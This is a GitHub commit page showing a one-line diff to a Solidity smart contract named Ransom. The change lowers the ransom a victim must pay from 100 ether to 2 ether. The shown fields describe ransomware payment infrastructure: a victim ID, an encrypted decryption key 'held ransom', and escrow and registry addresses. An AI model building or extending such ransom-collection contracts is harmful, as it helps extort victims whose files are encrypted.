Permalink
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Browse files
Set ransom amount to to ether
- Loading branch information
Showing
with
1 addition
and
1 deletion.
-
+1
−1
contracts/Ransom.sol
|
@@ -15,7 +15,7 @@ contract Ransom { |
|
|
uint victimId; //!< The unique ID of the victim |
|
|
string encKey; //!< The key (encrypted) being held ransom (needed to decrypt victim's files) |
|
|
address victimAddr; //!< The account address belonging to the victim |
|
|
uint constant RANSOMAMOUNT = 100 ether; //!< The ransom amount the victim must pay |
|
|
uint constant RANSOMAMOUNT = 2 ether; //!< The ransom amount the victim must pay |
|
|
address escrowAddr; //!< The address of the Escrow contract associated with this ransom |
|
|
address registryAddr; //!< The address of the Registry contract |
|
|
bool authenticated; //!< Indicates whether this contract has been authenticated with the Escrow |
|
|